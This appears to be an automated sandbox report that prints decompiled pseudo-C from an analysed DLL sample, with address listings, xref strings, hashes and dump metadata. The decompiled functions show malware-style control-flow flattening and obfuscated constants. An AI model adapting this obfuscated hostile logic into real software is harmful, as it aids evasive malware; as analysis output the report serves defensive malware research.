								E10010D6D(_v1724, _v1784, _v1736, _t573);
								_t655 = _t655 + 0x34;
								_t649 = 0x269ce6ac;
								while(1) {
									L1:
									_t553 = 0x2a6416b7;
									goto L2;
								}
							} else {
								if(_t649 == 0x64fcc40) {
									_t579 = E1001135B(_v1688, _v1808, _v1592, _v1596, _v1712);
									_t588 = _t579;
									_t655 = _t655 + 0xc;
									__eflags = _t579;
									_t553 = 0x2a6416b7;
									_t649 =  !=  ? 0x2a6416b7 : 0x30528e15;
									continue;
								} else {
									if(_t649 == 0x16d63096) {
										return E1000DE81(_v1640, _t648, _v1648);
									}
									if(_t649 == 0x1795f4ce) {
										E1000DE81(_v1644, _t588, _v1776);
										_t649 = 0x30528e15;
										while(1) {
											L1:
											_t553 = 0x2a6416b7;
											goto L2;
										}
									} else {
										if(_t649 == 0x1c05f6e2) {
											_push( &_v1564);
											_push(0x10001000);
											E1001B165(_v1600, _v1604);
											asm("sbb esi, esi");
											_t651 = _t649 & 0x21272103;
											__eflags = _t651;
											L13:
											_t649 = _t651 + 0x16d63096;
											while(1) {
												L1:
												_t553 = 0x2a6416b7;
												goto L2;
											}
										} else {
											if(_t649 == 0x1ef0e1ab) {
												E1000F1ED(_v1680, _v1720, _v1696, _v1816, _v1588);
												_t655 = _t655 + 0xc;
												_t649 = 0x2b2354e1;
												while(1) {
													L1:
													_t553 = 0x2a6416b7;
													goto L2;
												}
											} else {
												_t664 = _t649 - 0x269ce6ac;
												if(_t649 != 0x269ce6ac) {
													goto L28;
												} else {
													_push(1);
													_push( &_v1044);
													_push(_v1632);
													_push(_v1664);
													_push(_v1732);
													_push(_v1728);
													_push(0);
													_push(0);
													E10006417(_v1628, _t664);
													_t655 = _t655 + 0x20;
													_t649 = 0x1795f4ce;
													while(1) {
														L1:
														_t553 = 0x2a6416b7;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L18:
							__eflags = _t649 - 0x2bf7e78d;
							if(_t649 == 0x2bf7e78d) {
								E100057D4(_v1668,  &_v1596, _v1676, _v1656,  &_v1588);
								_t655 = _t655 + 0x10;
								asm("sbb esi, esi");
								_t649 = (_t649 & 0xe75eea95) + 0x1ef0e1ab;
								while(1) {
									L1:
									_t553 = 0x2a6416b7;
									goto L2;
								}
							}
							__eflags = _t649 - 0x30528e15;
							if(_t649 == 0x30528e15) {
								E1000DE81(_v1748, _v1596, _v1660);
								_pop(_t613);
								_t649 = 0x1ef0e1ab;
								while(1) {
									L1:
									_t553 = 0x2a6416b7;
									goto L2;
								}
							}
							__eflags = _t649 - 0x37fd5199;
							if(_t649 == 0x37fd5199) {
								_v1584 = E10013587();
								_t564 = E1001232B(_v1788, _t563, _v1796);
								_pop(_t615);
								_v1580 = 2 + _t564 * 2;
								_t613 =  &_v1588;
								E1000446D(_t613, _v1756, _t615, _v1764, _v1772, _t654, _t654, _v1684, _v1616, _v1780, _t654, _v1692, _v1624);
								_t655 = _t655 + 0x30;
								asm("sbb esi, esi");
								_t651 = _t649 & 0x1521b6f7;
								goto L13;
							}
							__eflags = _t649 - 0x3869a6dc;
							if(_t649 != 0x3869a6dc) {
								goto L28;
							}
							_t647 = 0x50;
							_t570 = E100054FB(_t647);
							_t648 = _t570;
							_t613 = _t613;
							__eflags = _t648;
							if(_t648 != 0) {
								_push(_t613);
								E1000471A(_v1608,  &_v524, _v1812, _v1700, _v1708, _v1820, _v1716);
								_t655 = _t655 + 0x20;
								_t649 = 0x1c05f6e2;
								goto L1;
							}
							return _t570;
						}
						__eflags = _t649 - 0x2b2354e1;
						if(_t649 == 0x2b2354e1) {
							_t649 = 0x1392add6;
							 *((intOrPtr*)(_t648 + 0x44)) = _v1600;
							 *_t648 =  *0x10021084;
							_t553 = 0x2a6416b7;
							 *0x10021084 = _t648;
							goto L28;
						}
						goto L18;
						L28:
						__eflags = _t649 - 0x1392add6;
					} while (__eflags != 0);
					return _t553;
				}
			}

0x1000adb9
0x1000adc0
0x1000adc7
0x1000adcf
0x1000adda
0x1000ade5
0x1000adf8
0x1000adff
0x1000ae04
0x1000ae0f
0x1000ae1a
0x1000ae25
0x1000ae30
0x1000ae38
0x1000ae40
0x1000ae48
0x1000ae50
0x1000ae58
0x1000ae60
0x1000ae68
0x1000ae6d
0x1000ae75
0x1000ae7d
0x1000ae88
0x1000ae90
0x1000ae9b
0x1000aea3
0x1000aeab
0x1000aeb3
0x1000aebb
0x1000aec3
0x1000aece
0x1000aed6
0x1000aee1
0x1000aeec
0x1000aef7
0x1000aeff
0x1000af0a
0x1000af15
0x1000af1d
0x1000af25
0x1000af2d
0x1000af35
0x1000af3d
0x1000af54
0x1000af55
0x1000af5c
0x1000af67
0x1000af72
0x1000af7a
0x1000af82
0x1000af8a
0x1000af92
0x1000af9a
0x1000afa5
0x1000afb0
0x1000afbb
0x1000afcb
0x1000afd1
0x1000afd6
0x1000afda
0x1000afe2
0x1000afea
0x1000aff6
0x1000aff9
0x1000b002
0x1000b006
0x1000b010
0x1000b018
0x1000b01d
0x1000b025
0x1000b02d
0x1000b035
0x1000b03d
0x1000b045
0x1000b04a
0x1000b052
0x1000b05a
0x1000b062
0x1000b067
0x1000b06c
0x1000b074
0x1000b07c
0x1000b087
0x1000b092
0x1000b09d
0x1000b0a5
0x1000b0ad
0x1000b0b9
0x1000b0ba
0x1000b0be
0x1000b0c6
0x1000b0d9
0x1000b0e8
0x1000b0ef
0x1000b0fa
0x1000b105
0x1000b110
0x1000b11b
0x1000b123
0x1000b128
0x1000b12d
0x1000b135
0x1000b13d
0x1000b148
0x1000b150
0x1000b15b
0x1000b166
0x1000b171
0x1000b179
0x1000b181
0x1000b18c
0x1000b197
0x1000b19f
0x1000b1aa
0x1000b1b5
0x1000b1bd
0x1000b1c8
0x1000b1d3
0x1000b1e0
0x1000b1e4
0x1000b1ec
0x1000b1f4
0x1000b1fc
0x1000b207
0x1000b212
0x1000b21d
0x1000b228
0x1000b230
0x1000b235
0x1000b23d
0x1000b245
0x1000b24d
0x1000b261
0x1000b268
0x1000b270
0x1000b27b
0x1000b283
0x1000b28b
0x1000b293
0x1000b29d
0x1000b2a5
0x1000b2ad
0x1000b2b5
0x1000b2bd
0x1000b2c5
0x1000b2cd
0x1000b2d5
0x1000b2e3
0x1000b2e8
0x1000b2ee
0x1000b2f3
0x1000b2fb
0x1000b306
0x1000b311
0x1000b31c
0x1000b327
0x1000b33a
0x1000b33d
0x1000b344
0x1000b34f
0x1000b357
0x1000b35c
0x1000b364
0x1000b368
0x1000b370
0x1000b378
0x1000b380
0x1000b388
0x1000b390
0x1000b3a0
0x1000b3a4
0x1000b3b1
0x1000b3b4
0x1000b3b8
0x1000b3c0
0x1000b3c8
0x1000b3d5
0x1000b3d9
0x1000b3e1
0x1000b3f3
0x1000b3f8
0x1000b401
0x1000b40c
0x1000b418
0x1000b41b
0x1000b41f
0x1000b427
0x1000b42f
0x1000b437
0x1000b43f
0x1000b444
0x1000b44c
0x1000b457
0x1000b462
0x1000b46d
0x1000b478
0x1000b480
0x1000b48b
0x1000b498
0x1000b4a0
0x1000b4ab
0x1000b4ba
0x1000b4bb
0x1000b4bf
0x1000b4c3
0x1000b4c8
0x1000b4d0
0x1000b4d8
0x1000b4e0
0x1000b4e8
0x1000b4f0
0x1000b4f8
0x1000b503
0x1000b50e
0x1000b519
0x1000b524
0x1000b52f
0x1000b537
0x1000b542
0x1000b54a
0x1000b552
0x1000b557
0x1000b55f
0x1000b56a
0x1000b575
0x1000b580
0x1000b58b
0x1000b598
0x1000b5a2
0x1000b5a6
0x1000b5ab
0x1000b5b3
0x1000b5be
0x1000b5c9
0x1000b5d4
0x1000b5df
0x1000b5e7
0x1000b5f2
0x1000b605
0x1000b60c
0x1000b614
0x1000b62a
0x1000b62f
0x1000b636
0x1000b638
0x1000b63f
0x1000b63f
0x1000b63f
0x1000b644
0x1000b644
0x1000b644
0x1000b644
0x1000b646
0x00000000
0x00000000
0x1000b64c
0x1000b79d
0x1000b7a2
0x1000b7a6
0x1000b7f4
0x1000b80c
0x1000b811
0x1000b814
0x1000b63f
0x1000b63f
0x1000b63f
0x00000000
0x1000b63f
0x1000b652
0x1000b658
0x1000b77f
0x1000b784
0x1000b786
0x1000b789
0x1000b790
0x1000b795
0x00000000
0x1000b65e
0x1000b664
0x00000000
0x1000b9e6
0x1000b670
0x1000b74f
0x1000b755
0x1000b63f
0x1000b63f
0x1000b63f
0x00000000
0x1000b63f
0x1000b676
0x1000b67c
0x1000b720
0x1000b721
0x1000b726
0x1000b72e
0x1000b731
0x1000b731
0x1000b737
0x1000b737
0x1000b63f
0x1000b63f
0x1000b63f
0x00000000
0x1000b63f
0x1000b682
0x1000b688
0x1000b6f9
0x1000b6fe
0x1000b701
0x1000b63f
0x1000b63f
0x1000b63f
0x00000000
0x1000b63f
0x1000b68a
0x1000b68a
0x1000b690
0x00000000
0x1000b696
0x1000b696
0x1000b69f
0x1000b6a0
0x1000b6a7
0x1000b6ae
0x1000b6b5
0x1000b6c3
0x1000b6c5
0x1000b6c7
0x1000b6cc
0x1000b6cf
0x1000b63f
0x1000b63f
0x1000b63f
0x00000000
0x1000b63f
0x1000b63f
0x1000b690
0x1000b688
0x1000b67c
0x1000b670
0x1000b658
0x1000b82a
0x1000b82a
0x1000b830
0x1000b985
0x1000b98a
0x1000b98f
0x1000b997
0x1000b63f
0x1000b63f
0x1000b63f
0x00000000
0x1000b63f
0x1000b63f
0x1000b836
0x1000b83c
0x1000b94c
0x1000b951
0x1000b952
0x1000b63f
0x1000b63f
0x1000b63f
0x00000000
0x1000b63f
0x1000b63f
0x1000b842
0x1000b848
0x1000b8ce
0x1000b8d5
0x1000b8da
0x1000b8f5
0x1000b91c
0x1000b923
0x1000b928
0x1000b92d
0x1000b92f
0x00000000
0x1000b92f
0x1000b84a
0x1000b850
0x00000000
0x00000000
0x1000b864
0x1000b865
0x1000b86a
0x1000b86c
0x1000b86d
0x1000b86f
0x1000b875
0x1000b8a2
0x1000b8a7
0x1000b8aa
0x00000000
0x1000b8aa
0x1000b9f1
0x1000b9f1
0x1000b81e
0x1000b824
0x1000b9a9
0x1000b9ae
0x1000b9b6
0x1000b9b8
0x1000b9bd
0x00000000
0x1000b9bd
0x00000000
0x1000b9c3
0x1000b9c3
0x1000b9c3
0x00000000
0x1000b644

Strings

T#+, xrefs: 1000B81E
Uk, xrefs: 1000AE90
De, xrefs: 1000AFEA
6~, xrefs: 1000B306
wP, xrefs: 1000B503
j, xrefs: 1000B5D4
T#+, xrefs: 1000B701
)7, xrefs: 1000ADE5
~v, xrefs: 1000AFBB
g+, xrefs: 1000B4AB
Q, xrefs: 1000B5AB
8B, xrefs: 1000B270
#D, xrefs: 1000B427
_", xrefs: 1000B55F
m', xrefs: 1000B3E1
ot, xrefs: 1000B1D3
o>, xrefs: 1000B18C
.hk), xrefs: 1000B0EF
A1, xrefs: 1000B181

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$ Q$#D$)7$.hk)$6~$8B$A1$De$Uk$_"$g+$m'$o>$ot$wP$~v$T#+$T#+
API String ID: 0-2608984025
Opcode ID: d6ce4f9d980ee98250f192a8e17da875beb05e45d46487c48ae24a70a7d958f2
Instruction ID: 628d9a06c93b4f99810bcb49accf5aec20451dc3338edf440eb80ec510f4e6d0
Opcode Fuzzy Hash: d6ce4f9d980ee98250f192a8e17da875beb05e45d46487c48ae24a70a7d958f2
Instruction Fuzzy Hash: 4D52017190C7818BE374CF24C849B9BBBE1FB94748F108A1DE6D9862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10017BBE Relevance: 18.2, Strings: 14, Instructions: 657
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10017BBE(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr* _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				intOrPtr* _v288;
				void* __ecx;
				intOrPtr* _t702;
				intOrPtr* _t706;
				intOrPtr* _t709;
				intOrPtr* _t714;
				intOrPtr* _t716;
				intOrPtr _t718;
				void* _t720;
				intOrPtr _t734;
				intOrPtr _t738;
				intOrPtr _t739;
				intOrPtr* _t740;
				intOrPtr _t750;
				void* _t764;
				void* _t815;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t855;
				intOrPtr* _t861;
				void* _t863;
				void* _t865;

				_t740 = _a20;
				_push(_a40);
				_push(_a36);
				_v16 = __edx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_t740);
				_push(_a16 & 0x0000ffff);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10012550(_a16 & 0x0000ffff);
				_v8 = 0x36204f;
				_v20 = 0;
				_t863 =  &_v288 + 0x30;
				_v4 = 0;
				_v272 = 0xdc69;
				_t861 = 0;
				_v272 = _v272 + 0xffff6337;
				_v272 = _v272 + 0xffff179b;
				_t855 = 0x175d2af;
				_v272 = _v272 << 0xa;
				_v272 = _v272 ^ 0xfd5cec00;
				_v204 = 0xa9cd;
				_v204 = _v204 + 0xe741;
				_v204 = _v204 << 0xa;
				_v28 = 0;
				_t832 = 0x3a;
				_v204 = _v204 / _t832;
				_v204 = _v204 ^ 0x001ba8a3;
				_v260 = 0x5d6b;
				_t833 = 0x6f;
				_v260 = _v260 / _t833;
				_t834 = 0x1e;
				_v288 = 0;
				_v260 = _v260 * 0x73;
				_v260 = _v260 * 0x64;
				_v260 = _v260 ^ 0x0025bafc;
				_v116 = 0x8d70;
				_v116 = _v116 * 0x63;
				_v116 = _v116 ^ 0x00363250;
				_v132 = 0x5ee0;
				_v132 = _v132 << 6;
				_v132 = _v132 / _t834;
				_v132 = _v132 ^ 0x00008a66;
				_v172 = 0xa39a;
				_t835 = 0xa;
				_v172 = _v172 / _t835;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x00505c00;
				_v148 = 0xec35;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 << 6;
				_v148 = _v148 ^ 0x00040380;
				_v180 = 0xfe27;
				_v180 = _v180 >> 0xe;
				_v180 = _v180 >> 0xb;
				_v180 = _v180 ^ 0x04000000;
				_v124 = 0x1d9b;
				_v124 = _v124 >> 2;
				_v124 = _v124 + 0xe7fe;
				_v124 = _v124 ^ 0x0008ef64;
				_v100 = 0x81fc;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000007;
				_v188 = 0xe2f5;
				_v188 = _v188 ^ 0x71f5675a;
				_v188 = _v188 | 0xaa328868;
				_v188 = _v188 ^ 0xfbf78cef;
				_v176 = 0x473a;
				_v176 = _v176 >> 0xf;
				_t836 = 0x33;
				_v176 = _v176 / _t836;
				_v176 = _v176 ^ 0x80000000;
				_v80 = 0xf23d;
				_v80 = _v80 + 0xffff33d4;
				_v80 = _v80 ^ 0x00002611;
				_v156 = 0xc473;
				_v156 = _v156 >> 0xc;
				_t837 = 0x65;
				_v156 = _v156 * 0x12;
				_v156 = _v156 ^ 0x000000db;
				_v112 = 0xf10b;
				_v112 = _v112 / _t837;
				_v112 = _v112 ^ 0x000006ec;
				_v60 = 0xdfe2;
				_v60 = _v60 ^ 0xa11a41e5;
				_v60 = _v60 ^ 0xa11ac0c1;
				_v184 = 0xb35b;
				_v184 = _v184 + 0xffff738c;
				_v184 = _v184 + 0xaea7;
				_v184 = _v184 ^ 0x0000b6b5;
				_v104 = 0xd6d;
				_v104 = _v104 | 0x69c9fc48;
				_v104 = _v104 ^ 0x69c98054;
				_v280 = 0x128c;
				_v280 = _v280 | 0x3ab331cb;
				_v280 = _v280 << 0xd;
				_t838 = 0x6e;
				_v280 = _v280 / _t838;
				_v280 = _v280 ^ 0x00ee7109;
				_v192 = 0x915d;
				_v192 = _v192 << 3;
				_v192 = _v192 ^ 0x4be63910;
				_v192 = _v192 ^ 0x4be2c2bd;
				_v256 = 0x1d7e;
				_v256 = _v256 << 0xc;
				_v256 = _v256 + 0x423a;
				_v256 = _v256 >> 2;
				_v256 = _v256 ^ 0x00763d31;
				_v264 = 0xd93b;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 + 0xbaa;
				_v264 = _v264 * 0x53;
				_v264 = _v264 ^ 0x0003caf0;
				_v276 = 0x45bb;
				_v276 = _v276 >> 0xe;
				_t839 = 0x52;
				_v276 = _v276 / _t839;
				_v276 = _v276 | 0xacdb8348;
				_v276 = _v276 ^ 0xacdbabf1;
				_v168 = 0x21d1;
				_t840 = 0x5f;
				_v168 = _v168 * 0x6c;
				_v168 = _v168 | 0xdafc5a22;
				_v168 = _v168 ^ 0xdafe2196;
				_v196 = 0xddc4;
				_v196 = _v196 >> 7;
				_v196 = _v196 / _t840;
				_v196 = _v196 ^ 0x00004407;
				_v72 = 0x5faa;
				_t841 = 0x19;
				_v72 = _v72 * 0x1f;
				_v72 = _v72 ^ 0x000beafb;
				_v144 = 0x94da;
				_v144 = _v144 | 0xc2399f35;
				_v144 = _v144 ^ 0x39a01d15;
				_v144 = _v144 ^ 0xfb99dd4a;
				_v152 = 0xccbe;
				_v152 = _v152 | 0x7027dc53;
				_v152 = _v152 ^ 0xf82ab60d;
				_v152 = _v152 ^ 0x880d3695;
				_v224 = 0xbc89;
				_v224 = _v224 + 0x37f5;
				_v224 = _v224 << 4;
				_v224 = _v224 + 0xba4c;
				_v224 = _v224 ^ 0x00103e7c;
				_v88 = 0x13fb;
				_v88 = _v88 / _t841;
				_v88 = _v88 ^ 0x0000146e;
				_v216 = 0x2a85;
				_v216 = _v216 >> 0xc;
				_v216 = _v216 >> 0xb;
				_v216 = _v216 + 0xffff9599;
				_v216 = _v216 ^ 0xffffae90;
				_v64 = 0x23ad;
				_v64 = _v64 + 0x6280;
				_v64 = _v64 ^ 0x0000a8ff;
				_v244 = 0xad34;
				_t842 = 0x78;
				_v244 = _v244 / _t842;
				_v244 = _v244 | 0x167eb282;
				_v244 = _v244 + 0xffff1b5d;
				_v244 = _v244 ^ 0x167d9f04;
				_v48 = 0xe2d3;
				_t843 = 0x44;
				_v48 = _v48 / _t843;
				_v48 = _v48 ^ 0x00006548;
				_v212 = 0x1f13;
				_v212 = _v212 | 0x5cd55339;
				_v212 = _v212 * 0x69;
				_v212 = _v212 << 0xf;
				_v212 = _v212 ^ 0x0799ff86;
				_v252 = 0x103d;
				_t844 = 0x2c;
				_v252 = _v252 / _t844;
				_v252 = _v252 << 1;
				_v252 = _v252 ^ 0x1506d405;
				_v252 = _v252 ^ 0x1506fe58;
				_v228 = 0xc990;
				_v228 = _v228 >> 0x10;
				_v228 = _v228 ^ 0xb1dbef51;
				_v228 = _v228 + 0xffff081c;
				_v228 = _v228 ^ 0xb1dafd56;
				_v40 = 0x9a48;
				_v40 = _v40 + 0xffff0212;
				_v40 = _v40 ^ 0xffffae48;
				_v108 = 0x52c;
				_v108 = _v108 >> 4;
				_v108 = _v108 ^ 0x0000049e;
				_v220 = 0x8eda;
				_v220 = _v220 | 0x6dde0b3f;
				_v220 = _v220 << 0xc;
				_v220 = _v220 >> 3;
				_v220 = _v220 ^ 0x1d1fa9c0;
				_v52 = 0xd0e6;
				_v52 = _v52 ^ 0x110e7ea1;
				_v52 = _v52 ^ 0x110ecde5;
				_v32 = 0xfc2c;
				_t845 = 0x76;
				_v32 = _v32 / _t845;
				_v32 = _v32 ^ 0x000058ce;
				_v268 = 0x3002;
				_v268 = _v268 ^ 0xd0ce5963;
				_v268 = _v268 + 0x23d4;
				_v268 = _v268 ^ 0x2e4fc162;
				_v268 = _v268 ^ 0xfe811412;
				_v236 = 0x3882;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0xffff636b;
				_v236 = _v236 << 4;
				_v236 = _v236 ^ 0xfff66e05;
				_v164 = 0x6dca;
				_t846 = 0x60;
				_v164 = _v164 / _t846;
				_v164 = _v164 + 0x77ed;
				_v164 = _v164 ^ 0x00001e7b;
				_v92 = 0x939d;
				_v92 = _v92 >> 0xe;
				_v92 = _v92 ^ 0x00001fb9;
				_v76 = 0xa6db;
				_t847 = 9;
				_v76 = _v76 * 0x46;
				_v76 = _v76 ^ 0x002da3d1;
				_v44 = 0xb214;
				_v44 = _v44 << 8;
				_v44 = _v44 ^ 0x00b26442;
				_v84 = 0xa70c;
				_v84 = _v84 / _t847;
				_v84 = _v84 ^ 0x00002a18;
				_v68 = 0xaf49;
				_t848 = 0x2e;
				_v68 = _v68 / _t848;
				_v68 = _v68 ^ 0x0000641b;
				_v36 = 0x3ceb;
				_t849 = 0x59;
				_v36 = _v36 / _t849;
				_v36 = _v36 ^ 0x0000250b;
				_v140 = 0x9e7;
				_v140 = _v140 ^ 0x2629db66;
				_v140 = _v140 ^ 0xb17286d6;
				_v140 = _v140 ^ 0x975b0c98;
				_v232 = 0x59a3;
				_v232 = _v232 + 0xffff4634;
				_v232 = _v232 + 0xbf67;
				_v232 = _v232 * 0x49;
				_v232 = _v232 ^ 0x001b190f;
				_v240 = 0x1d63;
				_v240 = _v240 + 0xffffb330;
				_v240 = _v240 << 5;
				_v240 = _v240 | 0x294c4af2;
				_v240 = _v240 ^ 0xfffe5dea;
				_v96 = 0xdd85;
				_v96 = _v96 / _t849;
				_v96 = _v96 ^ 0x00000a46;
				_v248 = 0x1e49;
				_t850 = 0x45;
				_v248 = _v248 / _t850;
				_v248 = _v248 >> 4;
				_t851 = 0x1e;
				_v248 = _v248 * 0xa;
				_v248 = _v248 ^ 0x000078ce;
				_v160 = 0x9fac;
				_v160 = _v160 / _t851;
				_v160 = _v160 + 0xffff662a;
				_v160 = _v160 ^ 0xffff2cd4;
				_v56 = 0x53a;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x000063d6;
				_v208 = 0x254f;
				_v208 = _v208 + 0xffff5d99;
				_v208 = _v208 >> 6;
				_v208 = _v208 >> 8;
				_v208 = _v208 ^ 0x0003aa31;
				_v136 = 0xe4f;
				_t852 = 5;
				_v136 = _v136 / _t852;
				_t853 = 0x59;
				_v136 = _v136 / _t853;
				_v136 = _v136 ^ 0x00004294;
				_v200 = 0xf4ca;
				_v200 = _v200 + 0xfcaa;
				_v200 = _v200 << 0x10;
				_v200 = _v200 + 0x7aed;
				_v200 = _v200 ^ 0xf1741e18;
				_v120 = 0x8825;
				_v120 = _v120 ^ 0xde537c51;
				_v120 = _v120 + 0xffff7f06;
				_v120 = _v120 ^ 0xde5329e7;
				_v128 = 0x8774;
				_v128 = _v128 * 0x60;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0x000048ff;
				_t854 = _v16;
				_t702 = _v284;
				while(1) {
					L1:
					_t815 = 0x1a641754;
					while(1) {
						_t865 = _t855 - _t815;
						if(_t865 > 0) {
							goto L19;
						}
						L3:
						if(_t865 == 0) {
							__eflags = E10009D2F(_t854, _a4);
							_t855 = 0x323551c7;
							_t720 = 1;
							_t861 =  !=  ? _t720 : _t861;
							goto L13;
						} else {
							if(_t855 == 0x175d2af) {
								_t855 = 0x3b541ff0;
								continue;
							} else {
								if(_t855 == 0x5ea51a5) {
									_push(_t745);
									_t702 = E10017AF1(_v244, _v48, _v24, _t745, _a36, _t745, _a16, _t745, _v156, _v212, _v252, _v228);
									_t863 = _t863 + 0x2c;
									_v284 = _t702;
									__eflags = _t702;
									_t855 =  !=  ? 0xa2907ca : 0x6317f3c;
									goto L14;
								} else {
									if(_t855 == 0x6317f3c) {
										E10007E91(_v24, _v120, _v128);
									} else {
										if(_t855 == 0x9b9cf87) {
											__eflags = E1001C2F5(_t854, _v204, __eflags) - _v260;
											_t815 = 0x1a641754;
											_t702 = _v284;
											_t745 = _v288;
											_t855 =  ==  ? 0x1a641754 : 0x323551c7;
											continue;
										} else {
											if(_t855 != 0xa2907ca) {
												L41:
												__eflags = _t855 - 0x34df9831;
												if(__eflags != 0) {
													_t702 = _v284;
													while(1) {
														_t865 = _t855 - _t815;
														if(_t865 > 0) {
															goto L19;
														}
														goto L3;
													}
													goto L19;
												}
											} else {
												_t871 = _t740;
												if(_t740 != 0) {
													_push(0x10001640);
													_push(_v52);
													_push(_v220);
													_t739 = E10005DFC(_v40, _v108, _t871);
													_t745 = _t739;
													_t863 = _t863 + 0xc;
													_v288 = _t739;
												}
												_t564 =  &_v92; // 0xa46
												_t734 = E100123BF(_v32, _v268, _a12, _t745, _t745, _v176 | _v188 | _v100 | _v124 | _v180 | _v148 | _v172 | _v132 | _v116, _v284, _t745, _t745, _v236, _t745, _v164,  *_t564);
												_t854 = _t734;
												_t760 = _v76;
												E10010D6D(_v76, _v44, _v84, _v288);
												_t863 = _t863 + 0x34;
												if(_t734 == 0) {
													L38:
													_t855 = 0x24a54ebe;
												} else {
													_v12 = 1;
													_t738 = E1000A074( &_v12, _t760, _v68, _v36, _t854, _v140);
													_t863 = _t863 + 0x14;
													_v12 = _t738;
													_t855 = 0x35deb4bf;
												}
												L13:
												_t702 = _v284;
												L14:
												_t745 = _v288;
												goto L1;
											}
										}
									}
								}
							}
						}
						L44:
						return _t861;
						L19:
						__eflags = _t855 - 0x24a54ebe;
						if(_t855 == 0x24a54ebe) {
							E10007E91(_t702, _v136, _v200);
							_t855 = 0x6317f3c;
							goto L40;
						} else {
							__eflags = _t855 - 0x323551c7;
							if(_t855 == 0x323551c7) {
								E10007E91(_t854, _v56, _v208);
								goto L38;
							} else {
								__eflags = _t855 - 0x335a9f57;
								if(_t855 == 0x335a9f57) {
									_push(_t745);
									_t706 = E1000F853(_v72, _v144, _v152, _v80, _v224, _v28, _t745, _t745, _v88);
									__eflags = _t706;
									_v24 = _t706;
									_t855 =  !=  ? 0x5ea51a5 : 0x34df9831;
									E1000DE81(_v216, _v28, _v64);
									_t863 = _t863 + 0x24;
									L40:
									_t745 = _v288;
									_t815 = 0x1a641754;
									goto L41;
								} else {
									__eflags = _t855 - 0x35deb4bf;
									if(_t855 == 0x35deb4bf) {
										__eflags = _t740;
										if(_t740 == 0) {
											_t750 = 0;
											__eflags = 0;
										} else {
											_t750 =  *_t740;
										}
										__eflags = _t740;
										if(_t740 == 0) {
											_t709 = 0;
											__eflags = 0;
										} else {
											_t709 =  *((intOrPtr*)(_t740 + 4));
										}
										E100146C1(_v16, _t854, _t750, _v232, _v240, _v96, _t709, _v248, _t750, _v160);
										_t863 = _t863 + 0x20;
										asm("sbb esi, esi");
										_t855 = (_t855 & 0xd7847dc0) + 0x323551c7;
										goto L13;
									} else {
										__eflags = _t855 - 0x3b541ff0;
										if(_t855 != 0x3b541ff0) {
											goto L41;
										} else {
											_v20 = 0x200;
											_t714 = E100054FB(0x200);
											_t858 = _t714;
											_t764 = 0x200;
											__eflags = _t714;
											if(__eflags != 0) {
												_t716 = E100071C3(_v184, _v104, _t858, _v280, _v192,  &_v20);
												_t863 = _t863 + 0x14;
												__eflags = _t716;
												if(_t716 == 0) {
													_push(_v276);
													_push(_t764);
													_t718 = E1000ECFE(_v256, _v264, _t858, _v272, _t764);
													_t863 = _t863 + 0x14;
													_v28 = _t718;
												}
												E1000DE81(_v168, _t858, _v196);
											}
											_t855 = 0x335a9f57;
											goto L13;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}

0x10017bcd
0x10017bd6
0x10017be0
0x10017be7
0x10017bee
0x10017bf5
0x10017bfc
0x10017c03
0x10017c04
0x10017c05
0x10017c0c
0x10017c13
0x10017c1a
0x10017c1c
0x10017c21
0x10017c2e
0x10017c35
0x10017c38
0x10017c41
0x10017c49
0x10017c4b
0x10017c55
0x10017c5d
0x10017c62
0x10017c67
0x10017c6f
0x10017c77
0x10017c7f
0x10017c84
0x10017c91
0x10017c96
0x10017c9c
0x10017ca4
0x10017cb0
